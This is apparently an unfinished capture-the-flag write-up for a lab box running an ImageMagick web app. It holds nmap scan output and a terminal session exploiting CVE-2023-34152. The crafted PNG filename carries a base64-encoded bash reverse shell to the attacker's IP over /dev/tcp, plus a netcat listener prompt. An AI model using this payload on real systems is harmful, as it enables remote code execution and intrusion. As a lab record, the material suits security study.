Image

Information Gathering

Port Scanning

Nmap scan report for 192.168.224.178
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: ImageMagick Identifier
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(kali㉿kali)-[~/ctf/pg/image/CVE-2023-34152]
└─$ python3 CVE-2023-34152.py 192.168.45.244 80  
Created by SudoIndividual (https://github.com/SudoIndividual)
PNG file (payload) have been created in current directory. Upload the payload to the server
Do you want to run netcat shell? [y/N]y
listening on [any] 80 ...
^C
                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/ctf/pg/image/CVE-2023-34152]
└─$ ls          
 CVE-2023-34152.py   README.md  '|smile"`echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yNDQvODAgMD4mMSI=|base64 -d|bash`".png'

Priv Esc
